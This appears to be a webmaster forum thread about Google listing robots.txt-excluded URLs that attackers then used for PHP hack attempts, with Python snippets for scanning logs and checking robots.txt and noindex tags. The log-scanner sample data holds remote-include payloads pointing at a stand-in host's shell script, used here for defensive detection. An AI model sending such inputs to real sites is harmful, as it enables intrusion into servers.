I've noticed that shortly after a number of my new sites were crawled by G, many of them were hit with an attempted PHP hack.
My logs tell me that the hacker entered the site via URLs that I was able to find in the Google index by searching for part of the query string, for example "/email.php?page" (undoubtedly the same search the hackers used to identify my sites as potential targets).
I understand that these pages have not themselves been crawled, but isn't it about time G got it right and stopped listing the URLs of excluded resources?
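For anyone wanting to check their own logs for the same pattern, here is a rough Python sketch. It assumes the attack is a remote-include attempt, i.e. a full URL passed in the "page" parameter, which the post above does not actually confirm. The function name, the sample paths and the attacker.example host are all made up for illustration.

```python
from urllib.parse import urlsplit, parse_qs

def suspicious_requests(request_paths, param="page"):
    """Return the request paths whose `param` value looks like a full URL.

    ASSUMPTION: the hack attempt passes a remote URL in the query string.
    Adjust the check if your logs show a different pattern.
    """
    flagged = []
    for path in request_paths:
        # parse_qs also decodes percent-encoded values such as http%3A%2F%2F
        query = parse_qs(urlsplit(path).query)
        if any("://" in value for value in query.get(param, [])):
            flagged.append(path)
    return flagged

# Hypothetical request paths, as they might be pulled out of an access log.
sample = [
    "/email.php?page=contact",
    "/email.php?page=http://attacker.example/shell.txt",
    "/email.php?page=http%3A%2F%2Fattacker.example%2Fshell.txt",
    "/index.php",
]
for hit in suspicious_requests(sample):
    print(hit)
```

Pulling the request path out of each log line is left out on purpose, since that depends on your server's log format.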
Is there anything I can do in future to stop these results from appearing in the SERPs?
[edited by: Marcia at 2:38 am (utc) on May 24, 2004]
It's comforting to realise that I'm not alone in this... Not so comforting to realise that there's no evident solution to this problem..!
On some of my sites roughly half the indexed URLs are (and have always been) explicitly excluded by robots.txt. I notice they have even been given PageRank.
This problem is doing my brain in, but the solution makes sense -- in a messy kind of way...
If the only way to get URLs out of the index is to ALLOW them to be crawled, does robots.txt have any real use other than to limit the bandwidth that crawlers consume?
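To make the distinction concrete: a robots.txt rule only answers "may this URL be fetched?", and says nothing about whether the URL may be listed. Here is a minimal Python sketch using the standard library's robots.txt parser. The rules and the example.com URLs are invented for illustration, not taken from anyone's actual site.

```python
from urllib.robotparser import RobotFileParser

def is_crawl_allowed(robots_txt, user_agent, url):
    """Return True if the robots.txt text permits user_agent to fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)

# Hypothetical robots.txt that excludes the script mentioned earlier in the thread.
EXAMPLE_ROBOTS_TXT = """\
User-agent: *
Disallow: /email.php
"""

blocked = is_crawl_allowed(
    EXAMPLE_ROBOTS_TXT, "Googlebot", "http://www.example.com/email.php?page=contact"
)
allowed = is_crawl_allowed(
    EXAMPLE_ROBOTS_TXT, "Googlebot", "http://www.example.com/index.html"
)
print(blocked, allowed)
```

A well-behaved crawler that gets False here never requests the page, so it never sees any noindex tag on it. That fits what people in this thread are reporting: the URL can still turn up as a URL-only listing.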
worked fine, and removed the "url-only listings" within a day or two (based on robots.txt disallow).
Removal Technique 1 (site A)
Result: robots.txt still disallows the URLs, and ALL disallowed URLs are OUT of the index.
Removal Technique 2 (site B)
Result: the disallowed URLs are now crawlable by G (with noindex tags), and ALL of them are still IN the index.
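If you try the noindex route, it is worth confirming that the tag really is in the HTML being served before waiting on G. A small Python sketch, assuming the usual robots meta tag form; the class and function names are made up for illustration.

```python
from html.parser import HTMLParser

class RobotsMetaParser(HTMLParser):
    """Collects the directives found in <meta name="robots" content="..."> tags."""

    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attr_map = {name: (value or "") for name, value in attrs}
        if attr_map.get("name", "").lower() != "robots":
            return
        # The content attribute is a comma-separated list, e.g. "noindex, follow".
        for directive in attr_map.get("content", "").split(","):
            directive = directive.strip().lower()
            if directive:
                self.directives.add(directive)

def has_noindex(html):
    """Return True if the page carries a robots meta tag containing noindex."""
    parser = RobotsMetaParser()
    parser.feed(html)
    return "noindex" in parser.directives

page = '<html><head><meta name="robots" content="noindex, follow"></head></html>'
print(has_noindex(page))
```

This only checks that the tag is present in the markup. It cannot tell you whether or when G will act on it.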
I'm off to use the removal tool again.......!